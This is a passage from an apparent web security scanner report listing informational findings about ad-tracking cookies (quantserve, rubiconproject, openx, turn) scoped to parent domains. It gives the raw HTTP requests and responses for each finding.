camp_freq_p1="eJzjkuGY/J5VgFHiQsPm9ywKjBoN27a+ZzFgtADzuWQ43k5kA8qehcp2Nm4Gy56Fyv5eCNI7Fyo7d/EOsCyYzyXBcfclC1B2xocGsOyMcyCTGSwYuEQ4ds5nFciS+PQeJMOgwQAWFeWY+YNFoJVZYtFpVOFdX1kEJjJKnFv+/x2y8CygGdcYJa68/IckLMJx9gWrALPEvqf3UEQ/vgI7dNcFFNFZG0Git74fRIgCAGMOVek="; io_freq_p1="eJzjEuZ4HCPAKHGhYfN7FgNGCzDNJc6xJB4oeBbEUWDQYABKnIVKXAgFSsxFkgCzuYQ5ngYAJWZ8aIBKMFgwcIlwbAsVOMAk8ek9quiPQIFWZolFp1FFbwUKTGSUOLf8/zuEqDDH5hgBZol9T++hCB4FOXnurgsogt3hQMFb3w8iBAHgcj64"; segments_p1="eJwdkMFKAmEUhdGZxc+sfLD29Qo9hriIJF3YqiiirE1EpM5CkVyFk0TkJsoCIVCjUFBaGMw00/3O5vBx7uWc+/+B71ZdL/DdOMmZPv7mTT87OLM3uDZFFxP0QdPI2HPppmElwgi12FfAWQIfLeDmLXwsp79GL4oEz2N4ZPueGziTiO3LJ2b3Ci9uGR7uYw/U3IvhUoqGGU77Gv54h5+b8IGuK2UENJzht3r2WvRkG6DeEiqrsYK/eui0pePk17roj1pHQ04a6vQbPbIy0z9oevqinzlBr2JK6gWT8ja5qj5X4l3ZCwK3M8kVXtvVpW/O+o/tlBvHu1TUk/w/jaxtDA=="

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Mon, 13 Jun 2011 11:21:06 GMT
P3P: policyref="/w3c/p3p.xml", CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Expires: Mon, 13-Jun-2011 11:20:46 GMT
Content-Type: text/html
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: dp_rec="{\"1\": 1305981628+ \"3\": 1307964066+ \"2\": 1307963584+ \"4\": 1305981633}"; Domain=invitemedia.com; expires=Tue, 12-Jun-2012 11:21:06 GMT; Path=/
Content-Length: 512

<html>
<body>
<script type="text/javascript">
makePixelRequest("http://edge.aperture.displaymarketplace.com/displayscript.js?liveConClientID=4316443142505&PixelID=186","javascr
...[SNIP]...

12.114. http://pixel.quantserve.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EOsBrAEB_QaBtw4YmjhNoYHKOzi1w5bRg9TqKDCCAQAAAvwR6CC-Js4YHtF2sjAOEQcB0R4TANH6HhuC0aXhQDBQoQPRThALg7O1w6gdHmwlsunS4RLaTxmH4Q; expires=Sun, 11-Sep-2011 11:01:22 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel;r=603990385;fpan=0;fpa=P0-99083065-1307962866999;ns=1;url=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F;ref=http%3A%2F%2Fsportdfw.com%2F2011%2F06%2F13%2F10-observations-dallas-mavs-finals%2F;ce=1;je=1;sr=1920x1200x32;enc=n;ogl=;dst=1;et=1307962880845;tzo=300;a=p-93vmRJG_BQlqo HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EF0BxAEB_QaBtw4azyhdwn2hgco7OLXDltGD1OooMIIBAAAC_BHoIL4mzhge0XayMA4RBwHRHhMA0foeGpEIfRpeFAMFChA9EgHhALg7O1w6gdHmwgBLLp0uES2k8Z9MLRgZ8dGpFg

Response

HTTP/1.1 302 Found
Connection: close
Location: http://ad.yieldmanager.com/unpixel?id=757134&id=1064710&id=1078422&id=1157704&id=1298254&id=1299054&id=1326570&t=2
Set-Cookie: d=EOsBrAEB_QaBtw4YmjhNoYHKOzi1w5bRg9TqKDCCAQAAAvwR6CC-Js4YHtF2sjAOEQcB0R4TANH6HhuC0aXhQDBQoQPRThALg7O1w6gdHmwlsunS4RLaTxmH4Q; expires=Sun, 11-Sep-2011 11:01:22 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 13 Jun 2011 11:01:22 GMT
Server: QS

12.115. http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.quantserve.com
Path:	/pixel/p-e4m3Yko6bFYVc.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

d=EHcBuAEB_QaBANW54uXPPR2hgco7OLXDqRtvGn6ClApAALIMIA_BsuggjhwuELbRzhge0XayMA4RBwHRHhMA0foeG4LRpeFAMFChA9FOEAuDs7XDqB0ccOnSpBDaSUmH4Q; expires=Sun, 11-Sep-2011 11:13:31 GMT; path=/; domain=.quantserve.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-e4m3Yko6bFYVc.gif?labels=Sports,Men HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://sportdfw.com/z-the-fort-worth-four/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dcd4b82-3e074-feeab-8b152; d=EAQBtQEB_QaBANW54uXPPR2hgco7OLXDqRtvGn6ClApAALIMIA_Bsugg_xwrbRzhge0XayMA4RBwHRHhMA0foeG4LRpeFAMFChA9FOEAuDs7XDqB0ccOnSpBDaSUmH4Q

Response

HTTP/1.1 302 Found
Connection: close
Location: http://pixel.rubiconproject.com/tap.php?v=5573
Set-Cookie: d=EHcBuAEB_QaBANW54uXPPR2hgco7OLXDqRtvGn6ClApAALIMIA_BsuggjhwuELbRzhge0XayMA4RBwHRHhMA0foeG4LRpeFAMFChA9FOEAuDs7XDqB0ccOnSpBDaSUmH4Q; expires=Sun, 11-Sep-2011 11:13:31 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 0
Date: Mon, 13 Jun 2011 11:13:31 GMT
Server: QS

12.116. http://pixel.rubiconproject.com/di.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/di.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 10-Dec-2011 11:22:18 GMT; path=/; domain=.rubiconproject.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /di.php?v=2372||2373|0||3810||2374||&r=3761|0,3169,3578,3577,2110,2195,2196,2197,2579,2198,4134,3734,2199,2364,2362,2363,2200,3810,2111,2494,2201,3513,2202,2496,2202,2496,2203,2204,2189,2112,2497,2205,2355,2495,5838,3811,3512,2109,3812,2239,2190,2206,2113,2206,2113,4552,2765,6184,2240,4105,4193,2372,2373,2374,2375, HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://fansided.com/category/nba/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; put_2081=AG-00000001389358554; put_1185=4325897289836481830; ruid=154dd07bb6adc1d6f31bfa10^6^1307963581^2915161843; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GhejWUS54NHOc/mc5f3LNIph0VqHPLHJEoduxZWv90oskBIySwfMah/ci9C+dMf4Fv4WU=; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; lm="13 Jun 2011 11:13:38 GMT"; ses2=13464^3; rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%262373%3D1%263810%3D1%262374%3D1%265720%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C3%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C682%2C3%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C0%2C1%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C%265576%3D12675%2C0%2C1%2C%2C%262827%3D12675%2C0%2C1%2C%2C%265573%3D12675%2C0%2C1%2C%2C%265720%3D12675%2C0%2C1%2C%2C%262373%3D12675%2C0%2C1%2C%2C%263810%3D12675%2C0%2C1%2C%2C%262374%3D12675%2C0%2C1%2C%2C; cd=false; rdk=5941/13464; ses9=13464^3; khaos=GOVBRMNC-I-DXQD

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:22:18 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=3580%3D1%264222%3D1%266811%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1%265576%3D1%265421%3D1%262827%3D1%265573%3D1%265720%3D1%262372%3D1%263810%3D1%262374%3D1; expires=Sat, 10-Dec-2011 11:22:18 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.117. http://pixel.rubiconproject.com/tap.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/tap.php

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:

rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1; expires=Wed, 13-Jul-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com
put_1185=4325897289836481830; expires=Fri, 12-Aug-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tap.php?v=4212&nid=1185&put=4325897289836481830&expires=60 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2146=xn7ja41kw4np53teeikidoecxeh9fu6s; au=GNQQ9N2W-FJJG-10.204.178.130; put_2054=c4f44b7e-9074-47a2-bdf0-9dda4e9d5fa4; put_1994=1voofy6a0tk1w; put_1986=3420415245200633085; lm="21 May 2011 12:38:06 GMT"; put_1512=4dd07bc8-e97b-118c-3dec-7b8c5c306530; put_2101=09035c0c-59c0-487e-ac6a-85a606e2b1c1; cd=false; put_2132=C3D0C0AD058DDF4DC222CA3B02A8143B; put_1197=3460050161923843111; ruid=154dd07bb6adc1d6f31bfa10^5^1306582818^2915161843; put_2081=AG-00000001389358554; put_1185=4325897289836481830; rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%264212%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1; rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C448%2C2%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C2%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C0%2C1%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:23 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=3580%3D1%264222%3D1%266811%3D1%265421%3D1%264940%3D1%264894%3D1%265852%3D1%264210%3D1%264214%3D1%267259%3D1%265671%3D1%26733%3D1%264338%3D1%267100%3D1%266432%3D1%266560%3D1%266643%3D1%266198%3D1%264212%3D1; expires=Wed, 13-Jul-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5671%3D11993%2C298%2C3%2C%2C%264212%3D11993%2C682%2C4%2C%2C%263580%3D11993%2C0%2C1%2C%2C%264222%3D11993%2C0%2C1%2C%2C%266811%3D11993%2C0%2C1%2C%2C%265421%3D11993%2C0%2C2%2C%2C%264940%3D12109%2C14%2C2%2C%2C%264894%3D12124%2C0%2C2%2C%2C%267259%3D12124%2C145%2C2%2C%2C%265852%3D12124%2C0%2C1%2C%2C%264210%3D12124%2C0%2C1%2C%2C%264214%3D12267%2C0%2C1%2C%2C%264338%3D12401%2C0%2C3%2C%2C%26733%3D12401%2C0%2C1%2C%2C%267100%3D12419%2C0%2C1%2C%2C%266198%3D12424%2C82%2C2%2C%2C%266560%3D12435%2C57%2C2%2C%2C%266643%3D12441%2C56%2C2%2C%2C%266432%3D12470%2C0%2C1%2C%2C; expires=Wed, 13-Jul-2011 11:02:23 GMT; path=/; domain=.pixel.rubiconproject.com
Set-Cookie: put_1185=4325897289836481830; expires=Fri, 12-Aug-2011 11:02:23 GMT; path=/; domain=.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;

12.118. http://r.openx.net/set previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.openx.net
Path:	/set

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 12-Jun-2013 11:02:25 GMT; path=/; domain=.openx.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /set?pid=21a19823-5de3-4917-bc81-a4edea5127ff&rtb=4325897289836481830 HTTP/1.1
Host: r.openx.net
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: p=1306540055; i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 11:02:25 GMT
Server: Apache
Cache-Control: public, max-age=30, proxy-revalidate
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Pragma: no-cache
P3P: CP="CUR ADM OUR NOR STA NID"
Set-Cookie: i=5cb31120-2bcf-44f1-b2a9-32c6ee29a288; expires=Wed, 12-Jun-2013 11:02:25 GMT; path=/; domain=.openx.net
Content-Length: 43
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D..;

12.119. http://r.turn.com/r/bd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://r.turn.com
Path:	/r/bd

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:

uid=4325897289836481830; Domain=.turn.com; Expires=Sat, 10-Dec-2011 11:15:26 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /r/bd?ddc=1&pid=18&uid=CAESEOOGEBTT9OtECB0SEmkPQV4&cver=1 HTTP/1.1
Host: r.turn.com
Proxy-Connection: keep-alive
Referer: http://cdn.turn.com/server/ddc.htm?uid=4325897289836481830&mktid=12&mpid=-1&fpid=-1&rnd=8520899083593882395&nu=n&sp=n&ctid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=4325897289836481830; adImpCount=CuIdyNnNbsd8IFR5CESMwk5_AoqRQoxQlknjNiZmToHG9Vs0lhNmAOrbA6BngiGu4vO0ygBXT7yKYydTIPtfk69H81IDSLR6XFCdfBEraHoHGwkOu-gn9s9EeeNrsNGLLA3nVVCBV6S_HCt4ul3HgSeuVhjqt4bzhbR2UrsOkAaE32ud4RfpxaJoBfXGZrRy2Bm3OHRNJuPJWm_u8AKXJ-Lq_12Rg25xtn3uTjSRzNjtIdlZav5LCaukNdINLIBPOFzb2lfSb2leKU62lyfe6oZUfy3cXERUlCbqf8bsFRDyIaTFIkAhb3O3_LfSj2D5zTu1xTABVuNBEjnQ7vQQlPwyqQd2kbcK6pvFQq-teAoLiST7x1GpJOjqaN2tR5kAYMps0hV4AuinP3IuoTyqBob-2qV2PRWg1D8SUwxYaEQFd8HpXzvs6OGZs9MqVMapxkzutrtWP-qhB9OfJQcvYHUbCLOdCASkmpn5H1zQiGL1mTvlVxq4kSctfknExbayqdAXWOgJeSF4J0CON8b5QZmdIlwYAD9OSKKN3Z7fa4Ifz6137vw1WRoGbxwsKWSnA2zovzUc76Tv1dBxqAuUWLbTNinx2VfUPWZEdO2Vy9VPvIk4l7uU-O46_JSAKJSaUIgjS9UzEBdyqIWT0SRhTjl3nZWj9DidA81bJpnYNWrizMSpzYJMZtxpnUFnah6riFwjJqLCroXwt55DUqJ9OxUiaJvJ3P8PjM_9LgSzB03-UDfgeKp_OSq1jV5EcY62jNnGwcm-v2Nc9ZUxrI5bArbFa4PhhzaWR_KoZyJmYtXKTCkVOSP7aMISPsMA-5rYZ6569AsLsth-iaBhgN4Y6oZUfy3cXERUlCbqf8bsFRCBoYnFScze6h4OQ8WDVtdszTu1xTABVuNBEjnQ7vQQlNsVabdjKJKhhCPvL4EA7VcHuAqFwiZZMCmLrNGrJ0WgYMps0hV4AuinP3IuoTyqBsa_PVtoNyD9YpIYrkswKlAFd8HpXzvs6OGZs9MqVMapM5v7pjR5GrWmy9D1ZMBDCPNm3FpXWJpPS8Rd_pZlWzvwMzO6hvz2FFiqch_RNwsPdqdyfXiXadvcoLjJc7MOB5mdIlwYAD9OSKKN3Z7fa4LkQL8LG1Xswle8pfz9MJgEQXxGYeBYfEO7xs5kfkscQ7bTNinx2VfUPWZEdO2Vy9XUc2wNpvMvPpne776QsqUDf_554SpIK3huzkg3GmVfA5mKdG9wfEgTrZ_HpdUxB4dqNvAVr3IxjVMU-dESpumxPmlnE2DerArFS73waNvuuw-VNoXnxHFwCUybMxiGRez-UDfgeKp_OSq1jV5EcY622S2W6vMqZ73lnXroBZZCIJlmoAI3Z7CCJpRgIdqQc9gLvfxtEfIP3Mgu2HVCMyT6Ye8sHu_4bGJr09YnZmqiqYnTG8vXtMcexI5g_6ntO2wVudVjXv710qx_I9zopHzosdGJ7AS1T6b5wiqmkpXpXdnt5ty1tos5E1Ar8ooOn_xHJa3tqGD6111JW3JDrDs30R3ym6B4AIsngkg-Untw7eeiUIk_QQbQ1Oc2DYvzZlIctgzop7L7m_ggs3PS7FLE0J_7oKjjzxbQbmixkRIYsHgcoS23WeHIgf_ApGB4ffykrPnoMmRtmOJTHuT4TLZswcYgCM7hKMCgsWzWU7StbEax1et2JxE0L6wqLjDdN2PjxtpnGLlrQ_v1_iIsNK3YbLvHH5DlZJnRA5TSggml5Vkx5hzJv_ogNmMnEecKQZ9TLZm6WlDbMzjxLwgMw3CMh3l1YEzqVjRPlCzU3sWqfGD3wSmKO4ttba9K0UuGWbDgtU7dib_VO4FYHBtZpXpxtgrDqQSfnHriEQfizDMop5Nlbka3cRHmW8JQbh5rTTYem1Og1flGKbh_GovT30ECBf74GlYyuvK9KnnIK8apm8pSycih6imKgjYngGQOdM2V7ruefAgc2DnSqRyDQHo09zZyCvywlaxJzfgdiIDDEbcEKy81Pxn5UwuWEd2NKdFk_cv5dlDFn-C7tAFxoeY4T7tyHWJjTSDIaJ1V_RMz19-GhRUIjuqdf6tJnR1NsAxe1z9ss6NXEdoBdHz1XXKNDOG1brXgeroIzd4C80BOQ5jllwylPntI0EFsF2fygOKzQfzs6tcbyLYy_I5kqleHXpcp61V_C97XLclj0PfNXbkGgVVrmLrpBl0wPQu0ZWN9PsRCwdrigvWm3hew5vSwfUn8cfIJteWX0KbGv_oMQyUSDxON3ZpXzbrcCtDhr1CrDQNprqT6LTvPSdTOxkAnyY7UhaqUCgmiIsYjYAfluMNhNF6QvDKF3FAvRLyyKgxwPafVsNCGDp8FUznCm_OeYPXW6COfNgsXeriVOqmy6A8g1H80g-BazvB_U5pzrNj2VtuePwYbxARyfSM0IxpDwROKZjbMK9VuySUPZ58x4b-T7KW5NHyxpI3gL4kr15i9-2A9WFlHdxjJG9OLWNQkS5uDrWjE8SWU1vESIjDaXQpIM7LHxEoX3lasSLfZcdAUw8CfNlZGPI9gjRxNjfZoV4P_bH3J1EiZLTliURG_QleD_2x9ydRImS05YlERv0IXzbHMdGRmx9f-wRr20Y1tF82xzHRkZsfX_sEa9tGNbanNXcRuj-D2o5vqE4DX4xevSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bq9JATch8tb6XeYutvUING6vSQE3IfLW-l3mLrb1CDRur0kBNyHy1vpd5i629Qg0bs3n6i53yAgbyR6eCHv0eMaIQAic5LsZDONJrUq6wbmYt43Cfg48Vc1r1TQiy_8-cCu5xswhjSp4pbQzt7RFH68NVw7Vie7EmZwU76g-TKghLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsLdyeFMnnM9pFJZdI4m-cLC3cnhTJ5zPaRSWXSOJvnCwt3J4Uyecz2kUll0jib5wsXuVT5JvF1W1aNjuoRaF-mkaxwhgTvGuwVCBlXozift5GscIYE7xrsFQgZV6M4n7eRrHCGBO8a7BUIGVejOJ-3kaxwhgTvGuwVCBlXozift4idoMR_SdzxDZ7G_w0clccS1fjlw50aU0NkdmzBnRWmOAIigblI_jtBLUcZYZrXOPgCIoG5SP47QS1HGWGa1zjl1bauoagZ1M1iCJfLP80Dzy3yIwjhg81IAYzHszNaYX3wDcbsxOHjC1U5u4EiJuIkeIetYnnl8gEyAgKZsW3xt6Dp_PeiyOD9QEUIwytD75uv-icKe0iPEBilltibzylcftZtsmjbDphE8x5XJBiuHH7WbbJo2w6YRPMeVyQYrhx-1m2yaNsOmETzHlckGK4cDq2CEfDid4wszbuaXE_TN0eUuYzj60ncUd4EVOJsejdHlLmM4-tJ3FHeBFTibHo3R5S5jOPrSdxR3gRU4mx6ITxCe407s0emJ3U9w9WXXkoTRX2fSbc7i_OzYNa_f3daWr1xXE0MIDwS9tWvxZrnGhxCyOEwJ6UEOxJDdP_5dhocQsjhMCelBDsSQ3T_-XYaHELI4TAnpQQ7EkN0__l2LzzRIHgCvOQow5SgLAWHHexSsvN7MDtJFV6wRit1nx5; fc=MWp4cE5jbv0XEkz_Ctovfc4qcg9-bn9SwzG9UG7pVfH7Nj5bGHqXk2A06xn0orl8mNEYHvmDrveO6RDJcMVxDYiks48zuVvaWDQAx0VVo3zPum_b70FfKpk3ju4oVkvZHC9go-mOaxov-BH8bOfKSItsuggz1E_U4uiXlRjdb9A78oQh5uLMFfvKDXObt_rST9NoqOhx59MhzvvL9oVqmIEEoaWdqdoBsvj70rBbRHxkrMB3cW0HroQP3xwOFfJNfuj8s2SsJjw03czPperUqzHVjXTBrUPRIETuoZhexzc; pf=3R3SKUUPFCoio1bGZvjNrz90sCTbjJoMGNRY49lN3lkdCPfTl6GVwLxMGMWABO2Hxhx5ALNZJagJ4MhMImSgO1j9Fw_ghz_PVAPwGCUX-93yzKimGqsD0iB4nMRqsP7Fo2p_sYe6FK71YFv8XCcCotMv9o6pa5vGMMnD4OdosTAdkTDGhgbOPz347HKULaPudC7UMMqtU-uTINCqeO5OuEL9QOcm54oK_vUb9hh6U2buGh5RH_9bIiRxjGlPA1strChLkPILqDevF3_ytWn-kDXnP7WTJzn5hC7GC86BA-XH4AovFAW5wYg3d6HNexkTzFpNF3hh_ymVCgGfBkee1knPZNXIe9A8BgTIbvpehe-k2s4kcWWbQbjBvv9DiSP3qKDEyZKkj9qg203fyq2TFtojUIBz8h_-Icn9K-ai00y2wJhpV1cKL0hO0j9B54GVhm47us_Csn3kHJ43JP-qHSBc4w9COMv7vDAXkl7P7uNQSKyLC2RsYFceW-v9Ivp_YD2RLpMpzj0AYE_Zac9hK_NAdWBQHVl-JPRF5hS10YO-4pC3ilKbQpP5MzC5Uc_kTeP1VDFWEeG9aPxYlZoS7h6d7CFXLgzFaAgYaTkStmC-QV4C2xn7TxBeOjVll9oOUmyWQqI6LTbGJiqxEuhQYn8rJzZ-n49wBvicimKkWWRsjPuConU0rTmVj5rk3Zs478f5w22ir_fCTLujc_dkGDf0XNwyIx4tuYj5ActmcnGU_ut7QWRoiVW-tzSSU50x81pN6PeKUPuttBCxxLR0bEXGPVB-KlOMchJXjiQA7q3qw9rqhVwrLsR04UQUf7H1SHNsnfeE9yPoFSHW8Ezu0u0_r320et_4BxanRu3aW6Od71gQ6z-o93xNve-0ihCBKuKRbYoeHkykGEWzpMqgE9YnGohfIt52_gTsgQl00yAdh_1PkFeE4BUm4Q3ZCHxVw0-Ht2JclSnzBdXwhsQ8i70yFd1p7EY1gmjobjhbl8py5vR-6hrOrfCxLuN-5IAUz5HNvuzTEFxauVGTueM8Vp8as4FPdyDpeeEni4cNLaW7CdLTrgTa3qKWD-Da3R0DjXbBpZz989wk0yGmAtqC-6oLvpO-g-SUTn1I2hqfIKAwJ3K0R_C6aRCJA-6dRcmmRsm2dg998jlQIlrO-XAkIu866aiXxhF5vdmmj1Eq8cbMUvEoglbvObqHTXsaSeX3eyilQCKGOvUGrC3yg6quWbT2J4_FGa1rnHzs2HLwdHSIZhxNbxZ4Mnp1HWQFNlPcrJU_yok8WE0ucKkz3qneksiNhOxeYM51PbZBq